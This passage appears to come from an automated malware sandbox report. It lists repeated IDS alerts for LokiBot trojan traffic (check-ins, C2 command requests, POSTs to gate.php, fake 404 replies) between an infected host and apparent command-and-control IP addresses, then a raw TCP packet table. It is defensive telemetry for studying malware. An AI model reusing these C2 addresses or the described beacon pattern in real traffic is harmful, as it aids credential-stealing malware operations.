                12/21/20-08:34:45.493159TCP2025381ET TROJAN LokiBot Checkin4931280192.168.2.22185.193.143.118
                12/21/20-08:34:45.493159TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931280192.168.2.22185.193.143.118
                12/21/20-08:34:45.493159TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4931280192.168.2.22185.193.143.118
                12/21/20-08:34:45.681647TCP2025483ET TROJAN LokiBot Fake 404 Response8049312185.193.143.118192.168.2.22
                12/21/20-08:34:45.965226TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931380192.168.2.22185.193.143.118
                12/21/20-08:34:45.965226TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931380192.168.2.22185.193.143.118
                12/21/20-08:34:45.965226TCP2025381ET TROJAN LokiBot Checkin4931380192.168.2.22185.193.143.118
                12/21/20-08:34:45.965226TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931380192.168.2.22185.193.143.118
                12/21/20-08:34:45.965226TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4931380192.168.2.22185.193.143.118
                12/21/20-08:34:46.144673TCP2025483ET TROJAN LokiBot Fake 404 Response8049313185.193.143.118192.168.2.22
                12/21/20-08:34:46.385293TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931480192.168.2.22185.193.143.118
                12/21/20-08:34:46.385293TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931480192.168.2.22185.193.143.118
                12/21/20-08:34:46.385293TCP2025381ET TROJAN LokiBot Checkin4931480192.168.2.22185.193.143.118
                12/21/20-08:34:46.385293TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931480192.168.2.22185.193.143.118
                12/21/20-08:34:46.385293TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4931480192.168.2.22185.193.143.118
                12/21/20-08:34:46.572973TCP2025483ET TROJAN LokiBot Fake 404 Response8049314185.193.143.118192.168.2.22
                12/21/20-08:34:46.831908TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931580192.168.2.22185.193.143.118
                12/21/20-08:34:46.831908TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931580192.168.2.22185.193.143.118
                12/21/20-08:34:46.831908TCP2025381ET TROJAN LokiBot Checkin4931580192.168.2.22185.193.143.118
                12/21/20-08:34:46.831908TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931580192.168.2.22185.193.143.118
                12/21/20-08:34:46.831908TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4931580192.168.2.22185.193.143.118
                12/21/20-08:34:47.024399TCP2025483ET TROJAN LokiBot Fake 404 Response8049315185.193.143.118192.168.2.22
                12/21/20-08:34:47.278368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931680192.168.2.22185.193.143.118
                12/21/20-08:34:47.278368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931680192.168.2.22185.193.143.118
                12/21/20-08:34:47.278368TCP2025381ET TROJAN LokiBot Checkin4931680192.168.2.22185.193.143.118
                12/21/20-08:34:47.278368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931680192.168.2.22185.193.143.118
                12/21/20-08:34:47.278368TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4931680192.168.2.22185.193.143.118
                12/21/20-08:34:47.471688TCP2025483ET TROJAN LokiBot Fake 404 Response8049316185.193.143.118192.168.2.22
                12/21/20-08:34:49.748142TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931780192.168.2.22185.193.143.118
                12/21/20-08:34:49.748142TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931780192.168.2.22185.193.143.118
                12/21/20-08:34:49.748142TCP2025381ET TROJAN LokiBot Checkin4931780192.168.2.22185.193.143.118
                12/21/20-08:34:49.748142TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931780192.168.2.22185.193.143.118
                12/21/20-08:34:49.748142TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4931780192.168.2.22185.193.143.118
                12/21/20-08:34:49.936609TCP2025483ET TROJAN LokiBot Fake 404 Response8049317185.193.143.118192.168.2.22
                12/21/20-08:34:50.191619TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931880192.168.2.22185.193.143.118
                12/21/20-08:34:50.191619TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931880192.168.2.22185.193.143.118
                12/21/20-08:34:50.191619TCP2025381ET TROJAN LokiBot Checkin4931880192.168.2.22185.193.143.118
                12/21/20-08:34:50.191619TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931880192.168.2.22185.193.143.118
                12/21/20-08:34:50.191619TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4931880192.168.2.22185.193.143.118
                12/21/20-08:34:50.381012TCP2025483ET TROJAN LokiBot Fake 404 Response8049318185.193.143.118192.168.2.22
                12/21/20-08:34:50.644380TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931980192.168.2.22185.193.143.118
                12/21/20-08:34:50.644380TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931980192.168.2.22185.193.143.118
                12/21/20-08:34:50.644380TCP2025381ET TROJAN LokiBot Checkin4931980192.168.2.22185.193.143.118
                12/21/20-08:34:50.644380TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931980192.168.2.22185.193.143.118
                12/21/20-08:34:50.644380TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4931980192.168.2.22185.193.143.118
                12/21/20-08:34:50.836068TCP2025483ET TROJAN LokiBot Fake 404 Response8049319185.193.143.118192.168.2.22
                12/21/20-08:34:51.092145TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932080192.168.2.22185.193.143.118
                12/21/20-08:34:51.092145TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932080192.168.2.22185.193.143.118
                12/21/20-08:34:51.092145TCP2025381ET TROJAN LokiBot Checkin4932080192.168.2.22185.193.143.118
                12/21/20-08:34:51.092145TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932080192.168.2.22185.193.143.118
                12/21/20-08:34:51.092145TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4932080192.168.2.22185.193.143.118
                12/21/20-08:34:51.279040TCP2025483ET TROJAN LokiBot Fake 404 Response8049320185.193.143.118192.168.2.22
                12/21/20-08:34:51.642592TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932180192.168.2.22185.193.143.118
                12/21/20-08:34:51.642592TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932180192.168.2.22185.193.143.118
                12/21/20-08:34:51.642592TCP2025381ET TROJAN LokiBot Checkin4932180192.168.2.22185.193.143.118
                12/21/20-08:34:51.642592TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932180192.168.2.22185.193.143.118
                12/21/20-08:34:51.642592TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4932180192.168.2.22185.193.143.118
                12/21/20-08:34:51.822869TCP2025483ET TROJAN LokiBot Fake 404 Response8049321185.193.143.118192.168.2.22
                12/21/20-08:34:52.076004TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932280192.168.2.22185.193.143.118
                12/21/20-08:34:52.076004TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932280192.168.2.22185.193.143.118
                12/21/20-08:34:52.076004TCP2025381ET TROJAN LokiBot Checkin4932280192.168.2.22185.193.143.118
                12/21/20-08:34:52.076004TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932280192.168.2.22185.193.143.118
                12/21/20-08:34:52.076004TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4932280192.168.2.22185.193.143.118
                12/21/20-08:34:52.725966TCP2025483ET TROJAN LokiBot Fake 404 Response8049322185.193.143.118192.168.2.22
                12/21/20-08:34:53.324671TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932380192.168.2.22185.193.143.118
                12/21/20-08:34:53.324671TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932380192.168.2.22185.193.143.118
                12/21/20-08:34:53.324671TCP2025381ET TROJAN LokiBot Checkin4932380192.168.2.22185.193.143.118
                12/21/20-08:34:53.324671TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932380192.168.2.22185.193.143.118
                12/21/20-08:34:53.324671TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4932380192.168.2.22185.193.143.118
                12/21/20-08:34:53.510987TCP2025483ET TROJAN LokiBot Fake 404 Response8049323185.193.143.118192.168.2.22
                12/21/20-08:34:53.771213TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932480192.168.2.22185.193.143.118
                12/21/20-08:34:53.771213TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932480192.168.2.22185.193.143.118
                12/21/20-08:34:53.771213TCP2025381ET TROJAN LokiBot Checkin4932480192.168.2.22185.193.143.118
                12/21/20-08:34:53.771213TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932480192.168.2.22185.193.143.118
                12/21/20-08:34:53.771213TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4932480192.168.2.22185.193.143.118
                12/21/20-08:34:53.966468TCP2025483ET TROJAN LokiBot Fake 404 Response8049324185.193.143.118192.168.2.22
                12/21/20-08:34:54.225843TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932580192.168.2.22185.193.143.118
                12/21/20-08:34:54.225843TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932580192.168.2.22185.193.143.118
                12/21/20-08:34:54.225843TCP2025381ET TROJAN LokiBot Checkin4932580192.168.2.22185.193.143.118
                12/21/20-08:34:54.225843TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932580192.168.2.22185.193.143.118
                12/21/20-08:34:54.225843TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4932580192.168.2.22185.193.143.118
                12/21/20-08:34:54.429844TCP2025483ET TROJAN LokiBot Fake 404 Response8049325185.193.143.118192.168.2.22
                12/21/20-08:34:54.695089TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932680192.168.2.22185.193.143.118
                12/21/20-08:34:54.695089TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932680192.168.2.22185.193.143.118
                12/21/20-08:34:54.695089TCP2025381ET TROJAN LokiBot Checkin4932680192.168.2.22185.193.143.118
                12/21/20-08:34:54.695089TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932680192.168.2.22185.193.143.118
                12/21/20-08:34:54.695089TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4932680192.168.2.22185.193.143.118
                12/21/20-08:34:54.893503TCP2025483ET TROJAN LokiBot Fake 404 Response8049326185.193.143.118192.168.2.22
                12/21/20-08:34:55.167333TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932780192.168.2.22185.193.143.118
                12/21/20-08:34:55.167333TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932780192.168.2.22185.193.143.118
                12/21/20-08:34:55.167333TCP2025381ET TROJAN LokiBot Checkin4932780192.168.2.22185.193.143.118
                12/21/20-08:34:55.167333TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932780192.168.2.22185.193.143.118
                12/21/20-08:34:55.167333TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4932780192.168.2.22185.193.143.118
                12/21/20-08:34:55.360511TCP2025483ET TROJAN LokiBot Fake 404 Response8049327185.193.143.118192.168.2.22
                12/21/20-08:34:55.621686TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932880192.168.2.22185.193.143.118
                12/21/20-08:34:55.621686TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932880192.168.2.22185.193.143.118
                12/21/20-08:34:55.621686TCP2025381ET TROJAN LokiBot Checkin4932880192.168.2.22185.193.143.118
                12/21/20-08:34:55.621686TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932880192.168.2.22185.193.143.118
                12/21/20-08:34:55.621686TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4932880192.168.2.22185.193.143.118
                12/21/20-08:34:55.806793TCP2025483ET TROJAN LokiBot Fake 404 Response8049328185.193.143.118192.168.2.22
                12/21/20-08:34:56.079166TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932980192.168.2.22185.193.143.118
                12/21/20-08:34:56.079166TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932980192.168.2.22185.193.143.118
                12/21/20-08:34:56.079166TCP2025381ET TROJAN LokiBot Checkin4932980192.168.2.22185.193.143.118
                12/21/20-08:34:56.079166TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932980192.168.2.22185.193.143.118
                12/21/20-08:34:56.079166TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4932980192.168.2.22185.193.143.118
                12/21/20-08:34:56.264152TCP2025483ET TROJAN LokiBot Fake 404 Response8049329185.193.143.118192.168.2.22
                12/21/20-08:34:56.523450TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933080192.168.2.22185.193.143.118
                12/21/20-08:34:56.523450TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933080192.168.2.22185.193.143.118
                12/21/20-08:34:56.523450TCP2025381ET TROJAN LokiBot Checkin4933080192.168.2.22185.193.143.118
                12/21/20-08:34:56.523450TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933080192.168.2.22185.193.143.118
                12/21/20-08:34:56.523450TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4933080192.168.2.22185.193.143.118
                12/21/20-08:34:56.707082TCP2025483ET TROJAN LokiBot Fake 404 Response8049330185.193.143.118192.168.2.22
                12/21/20-08:34:56.986700TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933180192.168.2.22185.193.143.118
                12/21/20-08:34:56.986700TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933180192.168.2.22185.193.143.118
                12/21/20-08:34:56.986700TCP2025381ET TROJAN LokiBot Checkin4933180192.168.2.22185.193.143.118
                12/21/20-08:34:56.986700TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933180192.168.2.22185.193.143.118
                12/21/20-08:34:56.986700TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4933180192.168.2.22185.193.143.118
                12/21/20-08:34:57.170484TCP2025483ET TROJAN LokiBot Fake 404 Response8049331185.193.143.118192.168.2.22
                12/21/20-08:34:57.440233TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933280192.168.2.22185.193.143.118
                12/21/20-08:34:57.440233TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933280192.168.2.22185.193.143.118
                12/21/20-08:34:57.440233TCP2025381ET TROJAN LokiBot Checkin4933280192.168.2.22185.193.143.118
                12/21/20-08:34:57.440233TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933280192.168.2.22185.193.143.118
                12/21/20-08:34:57.440233TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4933280192.168.2.22185.193.143.118
                12/21/20-08:34:57.637569TCP2025483ET TROJAN LokiBot Fake 404 Response8049332185.193.143.118192.168.2.22
                12/21/20-08:34:57.901392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933380192.168.2.22185.193.143.118
                12/21/20-08:34:57.901392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933380192.168.2.22185.193.143.118
                12/21/20-08:34:57.901392TCP2025381ET TROJAN LokiBot Checkin4933380192.168.2.22185.193.143.118
                12/21/20-08:34:57.901392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933380192.168.2.22185.193.143.118
                12/21/20-08:34:57.901392TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4933380192.168.2.22185.193.143.118
                12/21/20-08:34:58.109520TCP2025483ET TROJAN LokiBot Fake 404 Response8049333185.193.143.118192.168.2.22
                12/21/20-08:34:58.356886TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933480192.168.2.22185.193.143.118
                12/21/20-08:34:58.356886TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933480192.168.2.22185.193.143.118
                12/21/20-08:34:58.356886TCP2025381ET TROJAN LokiBot Checkin4933480192.168.2.22185.193.143.118
                12/21/20-08:34:58.356886TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933480192.168.2.22185.193.143.118
                12/21/20-08:34:58.356886TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4933480192.168.2.22185.193.143.118
                12/21/20-08:34:58.550989TCP2025483ET TROJAN LokiBot Fake 404 Response8049334185.193.143.118192.168.2.22
                12/21/20-08:34:58.807713TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933580192.168.2.22185.193.143.118
                12/21/20-08:34:58.807713TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933580192.168.2.22185.193.143.118
                12/21/20-08:34:58.807713TCP2025381ET TROJAN LokiBot Checkin4933580192.168.2.22185.193.143.118
                12/21/20-08:34:58.807713TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933580192.168.2.22185.193.143.118
                12/21/20-08:34:58.807713TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4933580192.168.2.22185.193.143.118
                12/21/20-08:34:58.996237TCP2025483ET TROJAN LokiBot Fake 404 Response8049335185.193.143.118192.168.2.22
                12/21/20-08:34:59.259529TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933680192.168.2.22185.193.143.118
                12/21/20-08:34:59.259529TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933680192.168.2.22185.193.143.118
                12/21/20-08:34:59.259529TCP2025381ET TROJAN LokiBot Checkin4933680192.168.2.22185.193.143.118
                12/21/20-08:34:59.259529TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933680192.168.2.22185.193.143.118
                12/21/20-08:34:59.259529TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4933680192.168.2.22185.193.143.118
                12/21/20-08:34:59.445801TCP2025483ET TROJAN LokiBot Fake 404 Response8049336185.193.143.118192.168.2.22
                12/21/20-08:34:59.709544TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933780192.168.2.22185.193.143.118
                12/21/20-08:34:59.709544TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933780192.168.2.22185.193.143.118
                12/21/20-08:34:59.709544TCP2025381ET TROJAN LokiBot Checkin4933780192.168.2.22185.193.143.118
                12/21/20-08:34:59.709544TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933780192.168.2.22185.193.143.118
                12/21/20-08:34:59.709544TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4933780192.168.2.22185.193.143.118
                12/21/20-08:34:59.901984TCP2025483ET TROJAN LokiBot Fake 404 Response8049337185.193.143.118192.168.2.22
                12/21/20-08:35:00.160897TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933880192.168.2.22185.193.143.118
                12/21/20-08:35:00.160897TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933880192.168.2.22185.193.143.118
                12/21/20-08:35:00.160897TCP2025381ET TROJAN LokiBot Checkin4933880192.168.2.22185.193.143.118
                12/21/20-08:35:00.160897TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933880192.168.2.22185.193.143.118
                12/21/20-08:35:00.160897TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4933880192.168.2.22185.193.143.118
                12/21/20-08:35:00.349518TCP2025483ET TROJAN LokiBot Fake 404 Response8049338185.193.143.118192.168.2.22
                12/21/20-08:35:00.610924TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933980192.168.2.22185.193.143.118
                12/21/20-08:35:00.610924TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933980192.168.2.22185.193.143.118
                12/21/20-08:35:00.610924TCP2025381ET TROJAN LokiBot Checkin4933980192.168.2.22185.193.143.118
                12/21/20-08:35:00.610924TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24933980192.168.2.22185.193.143.118
                12/21/20-08:35:00.610924TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4933980192.168.2.22185.193.143.118
                12/21/20-08:35:00.794681TCP2025483ET TROJAN LokiBot Fake 404 Response8049339185.193.143.118192.168.2.22
                12/21/20-08:35:01.047355TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934080192.168.2.22185.193.143.118
                12/21/20-08:35:01.047355TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934080192.168.2.22185.193.143.118
                12/21/20-08:35:01.047355TCP2025381ET TROJAN LokiBot Checkin4934080192.168.2.22185.193.143.118
                12/21/20-08:35:01.047355TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934080192.168.2.22185.193.143.118
                12/21/20-08:35:01.047355TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4934080192.168.2.22185.193.143.118
                12/21/20-08:35:01.230404TCP2025483ET TROJAN LokiBot Fake 404 Response8049340185.193.143.118192.168.2.22
                12/21/20-08:35:01.481208TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934180192.168.2.22185.193.143.118
                12/21/20-08:35:01.481208TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934180192.168.2.22185.193.143.118
                12/21/20-08:35:01.481208TCP2025381ET TROJAN LokiBot Checkin4934180192.168.2.22185.193.143.118
                12/21/20-08:35:01.481208TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934180192.168.2.22185.193.143.118
                12/21/20-08:35:01.481208TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4934180192.168.2.22185.193.143.118
                12/21/20-08:35:01.667487TCP2025483ET TROJAN LokiBot Fake 404 Response8049341185.193.143.118192.168.2.22
                12/21/20-08:35:01.938677TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934280192.168.2.22185.193.143.118
                12/21/20-08:35:01.938677TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934280192.168.2.22185.193.143.118
                12/21/20-08:35:01.938677TCP2025381ET TROJAN LokiBot Checkin4934280192.168.2.22185.193.143.118
                12/21/20-08:35:01.938677TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934280192.168.2.22185.193.143.118
                12/21/20-08:35:01.938677TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4934280192.168.2.22185.193.143.118
                12/21/20-08:35:02.127677TCP2025483ET TROJAN LokiBot Fake 404 Response8049342185.193.143.118192.168.2.22
                12/21/20-08:35:02.388886TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934380192.168.2.22185.193.143.118
                12/21/20-08:35:02.388886TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934380192.168.2.22185.193.143.118
                12/21/20-08:35:02.388886TCP2025381ET TROJAN LokiBot Checkin4934380192.168.2.22185.193.143.118
                12/21/20-08:35:02.388886TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934380192.168.2.22185.193.143.118
                12/21/20-08:35:02.388886TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4934380192.168.2.22185.193.143.118
                12/21/20-08:35:02.579013TCP2025483ET TROJAN LokiBot Fake 404 Response8049343185.193.143.118192.168.2.22
                12/21/20-08:35:02.836599TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14934480192.168.2.22185.193.143.118
                12/21/20-08:35:02.836599TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4934480192.168.2.22185.193.143.118
                12/21/20-08:35:02.836599TCP2025381ET TROJAN LokiBot Checkin4934480192.168.2.22185.193.143.118
                12/21/20-08:35:02.836599TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24934480192.168.2.22185.193.143.118
                12/21/20-08:35:02.836599TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4934480192.168.2.22185.193.143.118
                12/21/20-08:35:03.029088TCP2025483ET TROJAN LokiBot Fake 404 Response8049344185.193.143.118192.168.2.22

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 21, 2020 08:33:20.198736906 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:20.406172037 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:20.406368971 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:20.406845093 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:20.617223978 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:20.617294073 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:20.617346048 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:20.617429018 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:20.617459059 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:20.617507935 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:20.617548943 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:20.824466944 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:20.824496984 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:20.824522972 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:20.824539900 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:20.824547052 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:20.824567080 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:20.824577093 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:20.824588060 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:20.824605942 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:20.824608088 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:20.824631929 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:20.824649096 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:20.824662924 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:20.824675083 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:20.824712038 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:20.824727058 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.031974077 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.032004118 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.032027960 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.032048941 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.032068968 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.032089949 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.032111883 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.032129049 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.032150030 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.032159090 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.032170057 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.032186031 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.032191038 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.032210112 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.032222033 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.032233000 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.032255888 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.032259941 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.032277107 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.032288074 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.032298088 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.032319069 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.032346964 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.035811901 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240109921 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240147114 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240271091 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240298033 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240333080 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240340948 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240365028 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240386009 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240406036 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240411043 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240426064 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240441084 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240451097 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240468979 CET8049167103.141.138.119192.168.2.22
                Dec 21, 2020 08:33:21.240470886 CET4916780192.168.2.22103.141.138.119
                Dec 21, 2020 08:33:21.240483999 CET8049167103.141.138.119192.168.2.22
